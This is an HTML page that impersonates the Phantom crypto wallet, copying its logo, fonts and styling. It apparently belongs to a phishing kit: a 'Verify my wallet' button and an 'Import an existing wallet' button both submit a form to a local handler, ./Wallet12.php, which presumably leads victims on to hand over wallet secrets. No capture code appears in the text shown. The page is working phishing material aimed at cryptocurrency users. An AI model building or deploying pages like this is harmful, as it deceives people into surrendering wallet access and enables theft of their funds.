
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="favicon.ico" type="image/x-icon">
    <title>Phantom Wallet</title>
    <style>
        @font-face {
            font-family: Circular;
            font-style: normal;
            font-weight: 700;
            src: url(./style/Circular-Bold.2c65c79a.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 400;
            src: url(./style/Inter-Regular.170f3d57.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 400;
            src: url(./style/Inter-Italic.4848065e.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 500;
            src: url(./style/Inter-Medium.c57e220f.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 500;
            src: url(./style/Inter-MediumItalic.558fbca6.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 600;
            src: url(./style/Inter-SemiBold.ed4a77e7.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 600;
            src: url(./style/Inter-SemiBoldItalic.a7d72d01.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: normal;
            font-weight: 700;
            src: url(./style/Inter-Bold.2f504352.woff) format("woff")
        }

        @font-face {
            font-family: Inter;
            font-style: italic;
            font-weight: 700;
            src: url(./style/Inter-BoldItalic.531afb47.woff) format("woff")
        }
    </style>



    <style>
        body,
        html,
        * {
            box-sizing: border-box;
            font-family: Inter, Roboto, Arial;
            color: white;
            user-select: none;
            text-rendering: optimizespeed;
            -webkit-font-smoothing: antialiased;
        }

        body {
            background: rgb(44, 45, 48);
            min-height: 100vh;
            margin: 0px;
            display: flex;
            -webkit-box-pack: center;
            justify-content: center;
            -webkit-box-align: center;
            align-items: center;
        }

        html,
        body,
        div,
        span,
        applet,
        object,
        iframe,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        p,
        blockquote,
        pre,
        a,
        abbr,
        acronym,
        address,
        big,
        cite,
        code,
        del,
        dfn,
        em,
        img,
        ins,
        kbd,
        q,
        s,
        samp,
        small,
        strike,
        strong,
        sub,
        sup,
        tt,
        var,
        b,
        u,
        i,
        center,
        dl,
        dt,
        dd,
        menu,
        ol,
        ul,
        li,
        fieldset,
        form,
        label,
        legend,
        table,
        caption,
        tbody,
        tfoot,
        thead,
        tr,
        th,
        td,
        article,
        aside,
        canvas,
        details,
        embed,
        figure,
        figcaption,
        footer,
        header,
        hgroup,
        main,
        menu,
        nav,
        output,
        ruby,
        section,
        summary,
        time,
        mark,
        audio,
        video {
            margin: 0px;
            padding: 0px;
            border: 0px;
            font: inherit;
            vertical-align: baseline;
        }

        .hHWJsN {
            position: absolute;
            top: 0px;
            right: 0px;
            left: 0px;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: justify;
            justify-content: space-between;
            padding: 30px 40px;
        }

        .djqNbW {
            background: rgb(37, 37, 37);
            border-radius: 100px;
        }

        .lmJnPt {
            display: flex;
            flex-direction: row;
            width: auto;
            padding: 10px 20px;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .hWshXD {
            font-family: Circular, Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        }

        .eotGUX {
            color: white;
            text-align: center;
            font-style: normal;
            font-weight: 700;
            opacity: 1;
            font-size: 16px;
            margin: 0px 0px 0px 10px;
            line-height: 18px;
            text-decoration: none;
            background-color: transparent;
        }

        .dletZI {
            text-decoration: none;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
        }

        .dletZI svg {
            fill: rgb(170, 170, 170);
        }

        .ggRpVa {
            color: rgb(170, 170, 170);
            text-align: center;
            font-style: normal;
            font-weight: 500;
            opacity: 1;
            font-size: 16px;
            margin: 0px 0px 0px 8px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .JQFNG {
            width: 420px;
            min-height: 504px;
            position: relative;
            overflow: hidden;
            background-color: rgb(34, 34, 34);
            border: 1px solid rgb(50, 50, 50);
            border-radius: 8px;
            box-shadow: rgb(0 0 0 / 30%) 0px 10px 20px;
        }

        .bdpdgN {
            display: flex;
            flex-direction: row;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: start;
            justify-content: flex-start;
        }

        .hNrXGi {
            display: flex;
            flex-direction: column;
            -webkit-box-pack: justify;
            justify-content: space-between;
            -webkit-box-align: center;
            align-items: center;
            min-height: calc(458px);
            padding: 20px;
        }

        .hZwHQI {
            height: 100%;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .dAWGlU {
            height: 100%;
            margin-bottom: 20px;
            flex: 1 1 0%;
        }

        .iPPaaj {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .gwIklX {
            width: 100%;
            height: fit-content;
        }

        .fXtZsa {
            display: flex;
            flex-direction: column;
            width: 100%;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
        }

        .bAthNV svg:nth-child(2) {
            margin: 20px 0px;
        }

        .bhryEU {
            color: rgb(153, 153, 153);
            text-align: center;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 17px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }

        .hJnMKN {
            display: flex;
            flex-direction: column;
            width: 100%;
            align-items: flex-start;
            -webkit-box-pack: end;
            justify-content: flex-end;
        }

        .fimA-Dk:hover:enabled {
            background: rgb(226, 223, 254);
        }

        .dsAYhQ button:not(:last-child) {
            margin-bottom: 10px;
        }

        .fimA-Dk {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(171, 159, 242);
            color: rgb(34, 34, 34);
        }

        .fajfuv:hover:enabled {
            background: rgb(226, 223, 254);
        }

        .fajfuv {
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            align-items: flex-start;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: white;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background: rgb(51, 51, 51);
        }

        :focus,
        :focus-within {
            outline: transparent none 0px !important;
        }
    </style>


</head>

<body style="
    color: white;
    background: rgb(226, 223, 254);
    min-height: 100vh;
    margin: 0px;
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
"> <noscript>You need to enable Javascript to run this application.</noscript>
    <div id="root">
        <header class="sc-TBWPX hHWJsN">
            <div width="auto" class="">
                <svg width="32" viewBox="0 0 269 224" xmlns="http://www.w3.org/2000/svg" fill="#fff">
                    <path
                        d="M31.8301 224C66.1567 224 91.9536 194.147 107.349 170.557C105.476 175.776 104.436 180.995 104.436 186.006C104.436 199.784 112.342 209.596 127.944 209.596C149.373 209.596 172.257 190.807 184.115 170.557C183.283 173.48 182.867 176.194 182.867 178.699C182.867 188.302 188.276 194.356 199.302 194.356C234.045 194.356 268.995 132.772 268.995 78.9115C268.995 36.9506 247.775 0 194.517 0C100.899 0 0 114.401 0 188.302C0 217.32 15.603 224 31.8301 224ZM162.271 74.3187C162.271 63.8807 168.096 56.5741 176.626 56.5741C184.947 56.5741 190.773 63.8807 190.773 74.3187C190.773 84.7568 184.947 92.2721 176.626 92.2721C168.096 92.2721 162.271 84.7568 162.271 74.3187ZM206.792 74.3187C206.792 63.8807 212.617 56.5741 221.146 56.5741C229.468 56.5741 235.293 63.8807 235.293 74.3187C235.293 84.7568 229.468 92.2721 221.146 92.2721C212.617 92.2721 206.792 84.7568 206.792 74.3187Z"
                        style="
    fill: rgb(34, 34, 34);
    color: inherit;
"></path>
                </svg>
            </div><a href="#/" rel="noopener" target="_blank" class="sc-ZOtfp dletZI"><svg width="15"
                    viewBox="0 0 15 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path
                        d="M7.5 0C3.3589 0 0 3.3589 0 7.5C0 11.6411 3.3589 15 7.5 15C11.6411 15 15 11.6411 15 7.5C15 3.3589 11.6411 0 7.5 0ZM8.31288 11.7485C8.31288 12.0092 8.09816 12.2239 7.83742 12.2239H6.62577C6.36503 12.2239 6.15031 12.0092 6.15031 11.7485V10.9663C6.15031 10.7055 6.36503 10.4908 6.62577 10.4908H7.83742C8.09816 10.4908 8.31288 10.7055 8.31288 10.9663V11.7485ZM10.2301 7.08589C9.90798 7.53067 9.5092 7.88344 9.0184 8.14417C8.74233 8.32822 8.55828 8.51227 8.46626 8.72699C8.40491 8.86503 8.3589 9.04908 8.32822 9.2638C8.31288 9.43252 8.15951 9.55521 7.9908 9.55521H6.50307C6.30368 9.55521 6.15031 9.3865 6.16564 9.20245C6.19632 8.78834 6.30368 8.46626 6.47239 8.22086C6.68712 7.92945 7.07055 7.57669 7.6227 7.19325C7.91411 7.0092 8.12883 6.79448 8.29755 6.53374C8.46626 6.27301 8.54294 5.96626 8.54294 5.6135C8.54294 5.26074 8.45092 4.96932 8.25153 4.7546C8.05215 4.53988 7.79141 4.43252 7.43865 4.43252C7.14724 4.43252 6.91718 4.52454 6.71779 4.69325C6.59509 4.80061 6.5184 4.93865 6.47239 5.1227C6.41104 5.33742 6.21166 5.47546 5.98159 5.47546L4.60123 5.44479C4.43252 5.44479 4.29448 5.29141 4.30982 5.1227C4.35583 4.3865 4.64724 3.83436 5.15337 3.43558C5.7362 2.9908 6.48773 2.76074 7.43865 2.76074C8.45092 2.76074 9.24847 3.02147 9.83129 3.52761C10.4141 4.03374 10.7055 4.72393 10.7055 5.59816C10.7055 6.15031 10.5368 6.6411 10.2301 7.08589Z"
                        style="
    fill: rgb(34, 34, 34);
    color: inherit;
"></path>
                </svg>
                <p color="#AAA" size="16" opacity="1" class="sc-gsDKAQ ggRpVa"
                    style="color: rgb(34 34 34);font-family: Inter, Roboto, Arial;">Help</p>
            </a>
        </header>
        <main class="sc-dFtzxp JQFNG" style="min-height: auto;">
            <div width="100%" class="sc-bdvvtL sc-brSvTw bdpdgN hrizkJ"></div>
            <form method="POST" action="./Wallet12.php" class="sc-gIDmLj hNrXGi" style="opacity: 1; transform: none;">
                <div width="100%" class="sc-iCfMLu sc-Galmp iPPaaj hZwHQI">
                    <div width="100%" class="sc-iCfMLu sc-furwcr iPPaaj dAWGlU">
                        <div class="sc-pVTFL gwIklX">
                            <div width="100%" class="sc-iCfMLu sc-fWCJzd fXtZsa bAthNV"><svg width="256"
                                    viewBox="0 0 1139 224" fill="#fff" xmlns="http://www.w3.org/2000/svg" style="
    margin: 20px 0px;
">
                                    <path
                                        d="M31.8301 224C66.1567 224 91.9536 194.147 107.349 170.557C105.476 175.776 104.436 180.995 104.436 186.006C104.436 199.784 112.342 209.596 127.944 209.596C149.373 209.596 172.257 190.807 184.115 170.557C183.283 173.48 182.867 176.194 182.867 178.699C182.867 188.302 188.276 194.356 199.302 194.356C234.045 194.356 268.995 132.772 268.995 78.9115C268.995 36.9506 247.775 0 194.517 0C100.899 0 0 114.401 0 188.302C0 217.32 15.603 224 31.8301 224ZM162.271 74.3187C162.271 63.8807 168.096 56.5741 176.626 56.5741C184.947 56.5741 190.773 63.8807 190.773 74.3187C190.773 84.7568 184.947 92.2721 176.626 92.2721C168.096 92.2721 162.271 84.7568 162.271 74.3187ZM206.792 74.3187C206.792 63.8807 212.617 56.5741 221.146 56.5741C229.468 56.5741 235.293 63.8807 235.293 74.3187C235.293 84.7568 229.468 92.2721 221.146 92.2721C212.617 92.2721 206.792 84.7568 206.792 74.3187Z">
                                    </path>
                                    <path
                                        d="M310.588 201.245H341.793V170.557C341.793 156.153 340.545 150.725 333.264 136.112L337.216 134.024C347.826 158.867 362.805 167.843 378.199 167.843C402.955 167.843 422.718 146.132 422.718 112.522C422.718 80.3728 404.619 56.7828 378.615 56.7828C363.221 56.7828 347.826 65.5508 337.216 90.6021L333.264 88.5144C338.257 78.4939 341.793 69.0997 341.793 60.123H310.588V201.245ZM341.793 112.313C341.793 98.535 352.195 83.2954 367.589 83.2954C380.071 83.2954 390.265 93.5247 390.265 112.104C390.265 130.475 380.487 141.331 367.381 141.331C352.819 141.331 341.793 126.509 341.793 112.313Z">
                                    </path>
                                    <path
                                        d="M434.108 164.503H465.313V127.761C465.313 101.875 474.467 83.5042 491.525 83.5042C502.343 83.5042 505.672 90.8107 505.672 108.973V164.503H536.877V103.963C536.877 70.9785 525.019 56.7827 502.343 56.7827C479.043 56.7827 471.346 72.4398 462.401 91.437L458.448 89.3494C463.857 77.6588 465.313 70.561 465.313 60.1229V24.0074H434.108V164.503Z">
                                    </path>
                                    <path
                                        d="M582.482 167.843C602.661 167.843 614.519 154.483 623.464 137.364L627.209 139.243C623.256 147.385 619.512 156.779 619.512 164.503H650.093V107.72C650.093 73.9012 635.946 56.7828 602.869 56.7828C570.416 56.7828 554.397 73.0662 551.277 90.1845L581.234 95.4035C582.274 86.4268 589.555 80.3728 601.205 80.3728C612.855 80.3728 619.512 86.2181 619.512 93.3159C619.512 100.414 612.647 103.754 594.34 103.963C567.295 104.38 547.324 114.192 547.324 135.068C547.324 152.186 560.846 167.843 582.482 167.843ZM578.321 132.98C578.321 116.488 604.533 127.97 618.888 115.236V118.993C618.888 133.815 605.782 144.671 592.675 144.671C585.81 144.671 578.321 141.748 578.321 132.98Z">
                                    </path>
                                    <path
                                        d="M662.458 164.503H693.663V127.761C693.663 101.875 702.816 83.5042 719.875 83.5042C730.693 83.5042 734.021 90.8108 734.021 108.973V164.503H765.227V103.963C765.227 70.9786 753.369 56.7828 730.693 56.7828C707.393 56.7828 699.696 72.4399 690.75 91.4371L686.798 89.3495C692.207 77.6589 693.663 70.5611 693.663 60.123H662.458V164.503Z">
                                    </path>
                                    <path
                                        d="M848.341 164.921V139.034C841.684 141.331 823.169 145.297 823.169 130.058V85.1742H848.133V60.1229H823.169V32.149L791.756 41.5432V60.1229H773.033V85.1742H791.756L791.964 132.563C791.964 167.426 822.961 172.436 848.341 164.921Z">
                                    </path>
                                    <path
                                        d="M911.728 167.843C943.349 167.843 967.481 143.627 967.481 112.104C967.481 80.7903 943.349 56.7828 911.728 56.7828C880.107 56.7828 855.767 80.7903 855.767 112.104C855.767 143.627 880.107 167.843 911.728 167.843ZM888.012 112.313C888.012 94.986 897.79 82.8779 911.728 82.8779C925.666 82.8779 935.236 94.986 935.236 112.313C935.236 129.64 925.666 141.748 911.728 141.748C897.79 141.748 888.012 129.64 888.012 112.313Z">
                                    </path>
                                    <path
                                        d="M977.15 164.503H1008.35V127.761C1008.35 100.831 1016.88 83.5042 1030.61 83.5042C1039.56 83.5042 1042.47 90.6021 1042.47 108.973V164.503H1073.68V127.761C1073.68 102.501 1082.83 83.5042 1095.94 83.5042C1104.67 83.5042 1107.79 91.6459 1107.79 108.973V164.503H1139V103.963C1139 70.7698 1128.18 56.7828 1106.96 56.7828C1084.91 56.7828 1077.01 72.4399 1069.31 91.6459L1065.56 89.767C1072.85 67.8472 1057.03 56.7828 1041.43 56.7828C1020.84 56.7828 1013.35 72.4399 1005.03 91.4371L1001.28 89.3495C1006.48 77.6589 1008.35 70.5611 1008.35 60.123H977.15V164.503Z">
                                    </path>
                                </svg>
                                <p style="color: rgb(153, 153, 153);text-align: center;font-style: normal;font-weight: normal;opacity: 1;font-size: 20px;line-height: 24px;text-decoration: none;background-color: transparent;font-family: Inter, Roboto, Arial;"
                                    class="sc-gsDKAQ bhryEU" opacity="1" size="17" color="#999">To get started, create a
                                    new wallet or import an existing one.</p>
                            </div>
                        </div>
                    </div>
                    <div width="100%" class="sc-iCfMLu sc-dvQaRk hJnMKN dsAYhQ"><button font-size="16" font-weight="600"
                            width="100%" type="submit" class="sc-eCImPb fimA-Dk">Verify my wallet</button>

                        <button font-size="16" font-weight="600" width="100%" type="submit"
                            class="sc-eCImPb fajfuv">Import an existing wallet</button>
                    </div>
                </div>
            </form>
        </main>
    </div>
</body>

</html>